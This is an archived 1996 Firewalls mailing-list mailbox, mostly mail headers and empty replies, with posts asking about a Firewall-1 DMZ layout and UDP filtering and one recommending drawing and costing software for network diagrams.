Jan 1996 08:49:40 +0100 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Wed, 10 Jan 1996 08:45:49 +0100 From: Sander Wels To: firewalls@greatcircle.com Subject: Firewall setup Sender: firewalls-owner@GreatCircle.COM Precedence: bulk currently I'm working on a project to implement what we call external communication services, i.e. centrally provide means to dial out, dail in for tele-workers and a connection to internet. The dail-in service is setup using M$ RAS and it's dail back facility. The dail out will be implemented using a Cisco 500 to create a modempool. The connection to the internet will be used to send mail and start FTP, telnet and HTTP sessions from the secure network to the big and nasty outerspace. To secure the internet connection, the mail and the dail out service we plan on using Firewall-1. The firewall will be located as follows: secure net ----------------------------------------------- | | ----------- ---------- | FW-1 | |MS RAS |------- dial in. ----------- ---------- DMZ | | | ------------ | -------------- | | | ----------- | ----------- |mail serv| | |Cisco 500| ----------- | ----------- | | Internet dail out as one can see we connect the internet to the firewall and create a DMZ on a seperate segment of the firewall. The cisco can only be used to dail out originating from the secure network (the phone lines will be configured dail out only) The MS RAS server will be set up to use dail back to static locations i.e. no mobile connections. The DMZ will initially only be used to connect the mail server to, a WWW-server may be connected in the future. Can anyone comment on this set up please. I would like to know the risks and if this situation is secure :) or not :(. TIA Sander Wels From firewalls-owner Wed Jan 10 10:11:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00250 for firewalls-outgoing; Wed, 10 Jan 1996 09:46:49 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08787 for ; Wed, 10 Jan 1996 00:22:00 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA36473; Wed, 10 Jan 1996 09:21:23 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA19018; Wed, 10 Jan 1996 09:21:21 +0100 Date: Wed, 10 Jan 1996 09:21:21 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Firewalls-Digest V4 #726 To: ibg@oro.net Cc: Firewalls@GreatCircle.COM In-Reply-To: <199512300658.WAA15177@hg.oro.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 10:57:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00189 for firewalls-outgoing; Wed, 10 Jan 1996 09:43:48 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08818 for ; Wed, 10 Jan 1996 00:22:39 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA43200; Wed, 10 Jan 1996 09:22:00 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA20892; Wed, 10 Jan 1996 09:21:59 +0100 Date: Wed, 10 Jan 1996 09:21:59 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Re^2: Holes in SunOS sendmail -Reading Root Mail To: bei@io.com Cc: Firewalls@GreatCircle.COM In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 11:25:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00444 for firewalls-outgoing; Wed, 10 Jan 1996 09:57:42 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08854 for ; Wed, 10 Jan 1996 00:23:35 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA38553; Wed, 10 Jan 1996 09:21:38 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA13675; Wed, 10 Jan 1996 09:21:38 +0100 Date: Wed, 10 Jan 1996 09:21:38 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: SNMP <-> Firewalls To: Mike Cc: beames@ins.com, firewalls@GreatCircle.COM In-Reply-To: <199512281827.KAA12330@nanaimo.ark.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 12:52:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00654 for firewalls-outgoing; Wed, 10 Jan 1996 10:06:17 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08822 for ; Wed, 10 Jan 1996 00:22:41 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA19619; Wed, 10 Jan 1996 09:21:43 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA13687; Wed, 10 Jan 1996 09:21:42 +0100 Date: Wed, 10 Jan 1996 09:21:42 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Majordomo results: Firewalls-Digest V4 #728 To: Majordomo@au.wang.com Cc: Firewalls@GreatCircle.COM In-Reply-To: <199512281854.AA22946@chianina.au.wang.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 12:56:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00296 for firewalls-outgoing; Wed, 10 Jan 1996 09:50:51 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08755 for ; Wed, 10 Jan 1996 00:21:34 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA27529; Wed, 10 Jan 1996 09:21:27 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA04691; Wed, 10 Jan 1996 09:21:27 +0100 Date: Wed, 10 Jan 1996 09:21:27 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: setuid/setgid local delivery agents To: packrat@tartarus.uwa.edu.au Cc: firewalls@GreatCircle.COM In-Reply-To: <199512290955.RAA01679@ratbox.rattus.uwa.edu.au> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:13:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00676 for firewalls-outgoing; Wed, 10 Jan 1996 10:08:54 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08658 for ; Wed, 10 Jan 1996 00:19:57 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA06429; Wed, 10 Jan 1996 09:20:40 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA17139; Wed, 10 Jan 1996 09:20:39 +0100 Date: Wed, 10 Jan 1996 09:20:39 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: FW-1 does not prevent session hijacking? Please support clai To: Kare.Presttun@ansf.alcatel.fr Cc: Firewalls@GreatCircle.COM In-Reply-To: <9512291237.AA20064@istans.ansf.alcatel.fr> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:14:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00318 for firewalls-outgoing; Wed, 10 Jan 1996 09:52:13 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08612 for ; Wed, 10 Jan 1996 00:19:23 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA27383; Wed, 10 Jan 1996 09:20:15 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA14787; Wed, 10 Jan 1996 09:20:14 +0100 Date: Wed, 10 Jan 1996 09:20:14 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Firewalls needed for both dial-in AND dial-out To: /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com Cc: firewalls@GreatCircle.com, /G=BECKY/S=HEROLD@mhs-pfg1.attmail.com In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:16:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00330 for firewalls-outgoing; Wed, 10 Jan 1996 09:53:35 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08836 for ; Wed, 10 Jan 1996 00:23:06 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA23547; Wed, 10 Jan 1996 09:20:17 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA14793; Wed, 10 Jan 1996 09:20:16 +0100 Date: Wed, 10 Jan 1996 09:20:16 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Security managing Cisco Routers To: Craig McLellan Cc: firewalls , pietro In-Reply-To: <30E831CE@mnbp.network.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:17:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00496 for firewalls-outgoing; Wed, 10 Jan 1996 09:59:19 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08745 for ; Wed, 10 Jan 1996 00:21:30 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA33631; Wed, 10 Jan 1996 09:21:11 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA14386; Wed, 10 Jan 1996 09:21:10 +0100 Date: Wed, 10 Jan 1996 09:21:10 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Dawg wants rootkit for Christmas To: Julian Assange Cc: Sick Puppy , firewalls@greatcircle.com In-Reply-To: <199512292356.KAA16186@suburbia.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:19:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00565 for firewalls-outgoing; Wed, 10 Jan 1996 10:02:17 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08826 for ; Wed, 10 Jan 1996 00:22:42 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA41163; Wed, 10 Jan 1996 09:22:04 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA04773; Wed, 10 Jan 1996 09:22:03 +0100 Date: Wed, 10 Jan 1996 09:22:03 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Firewalls - A Request To: Darren Reed Cc: Kenneth Smith , firewalls@GreatCircle.COM In-Reply-To: <199512280938.BAA11807@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:21:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00601 for firewalls-outgoing; Wed, 10 Jan 1996 10:03:37 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08879 for ; Wed, 10 Jan 1996 00:24:16 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA18434; Wed, 10 Jan 1996 09:20:21 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA15826; Wed, 10 Jan 1996 09:20:20 +0100 Date: Wed, 10 Jan 1996 09:20:20 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: java info To: Marianne Mueller Cc: raf@uzunx.com, firewalls@greatcircle.com, jcmurphy@smurfland.cit.buffalo.edu In-Reply-To: <9512302058.AA05518@puffin.Eng.Sun.COM> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:22:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00342 for firewalls-outgoing; Wed, 10 Jan 1996 09:56:07 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08750 for ; Wed, 10 Jan 1996 00:21:25 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA23950; Wed, 10 Jan 1996 09:21:30 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA19033; Wed, 10 Jan 1996 09:21:29 +0100 Date: Wed, 10 Jan 1996 09:21:29 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: FW-1 does not prevent session hijacking? Please support claim. To: Mike Cc: nehynuci@nanaimo.ark.com, firewalls@GreatCircle.COM In-Reply-To: <199512281828.KAA12356@nanaimo.ark.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:24:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00555 for firewalls-outgoing; Wed, 10 Jan 1996 10:00:59 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08811 for ; Wed, 10 Jan 1996 00:22:29 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA21930; Wed, 10 Jan 1996 09:21:47 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA20609; Wed, 10 Jan 1996 09:21:46 +0100 Date: Wed, 10 Jan 1996 09:21:45 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: FW-1 does not prevent session hijacking? Please support claim. To: Mike Cc: nehynuci@nanaimo.ark.com, firewalls In-Reply-To: <199512281827.KAA12343@nanaimo.ark.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:25:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00668 for firewalls-outgoing; Wed, 10 Jan 1996 10:07:37 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08660 for ; Wed, 10 Jan 1996 00:19:58 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA20233; Wed, 10 Jan 1996 09:20:24 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA15835; Wed, 10 Jan 1996 09:20:24 +0100 Date: Wed, 10 Jan 1996 09:20:24 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Firewalls-Digest V4 #726 To: Jon Spencer Cc: Hany Mohamed Gaber , firewalls-digest-owner@uunet.uu.net, firewalls-digest@GreatCircle.COM In-Reply-To: <199512310838.IAA15563@splinter> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:27:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00127 for firewalls-outgoing; Wed, 10 Jan 1996 09:41:21 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08893 for ; Wed, 10 Jan 1996 00:24:27 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA29736; Wed, 10 Jan 1996 09:20:45 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA15615; Wed, 10 Jan 1996 09:20:44 +0100 Date: Wed, 10 Jan 1996 09:20:44 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Brain21 To: Brain21 Cc: Gavin Ferreiro , "'firewalls@GreatCircle.COM'" In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:29:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00239 for firewalls-outgoing; Wed, 10 Jan 1996 09:45:33 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08869 for ; Wed, 10 Jan 1996 00:23:59 -0800 (PST) Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA24337; Wed, 10 Jan 1996 09:20:35 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA16612; Wed, 10 Jan 1996 09:20:34 +0100 Date: Wed, 10 Jan 1996 09:20:33 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Holes in SunOS sendmail -Reading Root Mail To: Adam Prato Cc: Doug Hughes , Doug.Hughes@Eng.Auburn.EDU, mcleod@cynergy.com.au, firewalls@GreatCircle.COM In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:30:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00337 for firewalls-outgoing; Wed, 10 Jan 1996 09:53:40 -0800 (PST) Received: from mailhub.cts.com (mailhub.cts.com [192.188.72.25]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA00332 for ; Wed, 10 Jan 1996 09:53:36 -0800 (PST) Received: from lostcause by mailhub.cts.com with smtp (Smail3.1.29.1 #20) id m0ta4hN-000V0yC; Wed, 10 Jan 96 09:52 PST Message-Id: Date: Wed, 10 Jan 96 09:52 PST X-Sender: sksharp@mail.cts.com X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: "Steven K. Sharp" Subject: UDP and the unclean... Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please forgive me if this is a stupid question, but why is UDP such a bad thing? Especially things like RealAudio, this uses UDP to communicate (as do many other programs). What security risk does UDP pose? I've seen that most people filter out all UDP first and then work from there with TCP. Would it be a gaping hole to allow it? Thanks for any clarification. Steven From firewalls-owner Wed Jan 10 13:32:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00635 for firewalls-outgoing; Wed, 10 Jan 1996 10:04:59 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08922 for ; Wed, 10 Jan 1996 00:25:01 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id AAA21603; Wed, 10 Jan 1996 00:20:58 -0800 Received: from s04.eps.ua.es(193.145.232.32) by mycroft via smap (V1.3mjr) id sma021558; Wed Jan 10 00:20:07 1996 Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA27532; Wed, 10 Jan 1996 09:21:28 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA12118; Wed, 10 Jan 1996 09:21:28 +0100 Date: Wed, 10 Jan 1996 09:21:28 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: Thank you for the code To: wang Cc: Firewalls@GreatCircle.COM In-Reply-To: <9512298202.AA820259571@ccmail.nli-research.co.jp> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 13:34:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00278 for firewalls-outgoing; Wed, 10 Jan 1996 09:49:31 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08867 for ; Wed, 10 Jan 1996 00:23:58 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id AAA21574; Wed, 10 Jan 1996 00:19:59 -0800 Received: from s04.eps.ua.es(193.145.232.32) by mycroft via smap (V1.3mjr) id sma021551; Wed Jan 10 00:19:34 1996 Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA27168; Wed, 10 Jan 1996 09:20:41 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA17142; Wed, 10 Jan 1996 09:20:40 +0100 Date: Wed, 10 Jan 1996 09:20:40 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: setuid/setgid local delivery agents To: Bill Gianopoulos Cc: Doug Hughes , firewalls@GreatCircle.COM In-Reply-To: <199512291259.HAA02186@swlpak.msd.ray.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 14:11:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00257 for firewalls-outgoing; Wed, 10 Jan 1996 09:48:08 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08921 for ; Wed, 10 Jan 1996 00:25:03 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id AAA21600; Wed, 10 Jan 1996 00:20:57 -0800 Received: from s04.eps.ua.es(193.145.232.32) by mycroft via smap (V1.3mjr) id sma021549; Wed Jan 10 00:19:24 1996 Received: from s01.eps.ua.es by s04.eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA21933; Wed, 10 Jan 1996 09:21:49 +0100 Received: from c12.eps.ua.es by eps.ua.es (AIX 3.2/UCB 5.64/4.03) id AA04741; Wed, 10 Jan 1996 09:21:47 +0100 Date: Wed, 10 Jan 1996 09:21:47 +0100 (MET) From: JOSE LUIS VERDEGUER NAVARRO Reply-To: JOSE LUIS VERDEGUER NAVARRO Subject: Re: FW-1 does not prevent session hijacking? Please support claim. To: Darren Reed Cc: Brain21 , frankw@in.net, firewalls@GreatCircle.COM In-Reply-To: <199512280903.BAA10538@miles.greatcircle.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From firewalls-owner Wed Jan 10 14:14:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA00141 for firewalls-outgoing; Wed, 10 Jan 1996 09:41:42 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA00133 for ; Wed, 10 Jan 1996 09:41:37 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id JAA25789; Wed, 10 Jan 1996 09:38:40 -0800 Received: from mcfeely.bsfs.org(204.91.13.34) by mycroft via smap (V1.3mjr) id sma025785; Wed Jan 10 09:37:55 1996 Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id MAA15746; Wed, 10 Jan 1996 12:36:10 -0500 Date: Wed, 10 Jan 1996 12:36:05 -0500 (EST) From: Rabid Wombat To: Brain21 cc: Bob Resino , grau@muc.de, firewalls@GreatCircle.COM Subject: Re: Off-Topic: Selling Firewalls In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Brain21 wrote: > On Mon, 8 Jan 1996, Bob Resino wrote: > > > > - how to draw network designs > > > - how to calculate network topology, eg. IP-numbers and netmasks > > > - how to calculate the costs for the equipment (firewalls, routers ...) > > > - how to ... > > > I use Visio Pro to draw network topologies. It has a fair library of icons, and can import a wide variety of file types if you want to create your own from scratch or clip art. This is an M$-Wind0ws compatible product, but it sounds like that's what you're running. I use M$-Excel for calculating costs. If you want a customized solution, there are third-party database links to Autocad that would allow you to generate costs from a database linked to a drawing. This would be a much more expensive solution, in terms of software costs, workstation requirements, learning curve, configuration, etc., and wouldn't pay off unless you are doing nothing but costing/managing networks all day long. There is a facilities management package called AfMan that is an AutoCad add-on - it was designed to update faclities databases from changes made to an AutoCad drawing, do job costs, etc., but could easily be used/adapted to network costing / management. Contact Gene Wachowski at KDP, 301-419-0085 if interested. I'd recommend sticking with Visio, however.You can learn the basics and be up and running in half an hour, but it supports CAD-like functions, such as basic snaps, etc. Once this came out, I stopped using everything else. Shapeware Corporation, 1-800-446-3335 or 303-743-9533. > > > You might want to think about a CAD package, like > > Intergraph Microstation or IsiCad. The Microstation > > Don't know what they cost, but I believe that Microstation is MORE > expensive than AutoCAD, which runs in the neighborhood of $5000. That's > a little high for what the original poster wants to do, I think. > Besides, he is obviously running Windows (mention of Powerpoint), and > Microstation is UNIX isn't it? (not sure). I know that Freelance Graphic > blows for this kind of stuff. Perhaps something like Corel Draw may be > better? The latest version is 6.0, and I think you can get 5.0 and 4 for > less than $100 or so now. This and a decent clipart package (or look, > there is a usenet group for clip-art, I think) would be all that you > really need for network diagrams. Then you could import these into Excel > or 1-2-3 or something if you need to have cost projections and network > diagrams on one page. > > As for IP addresses, etc. I think you are on your own there. > > Brain21 > From firewalls-owner Wed Jan 10 14:26:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA00693 for firewalls-outgoing; Wed, 10 Jan 1996 10:10:15 -0800 (PST) Received: from s04.eps.ua.es (s04.eps.ua.es [193.145.232.32]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id AAA08662 for ; Wed, 10 Jan 1996 00:19:59 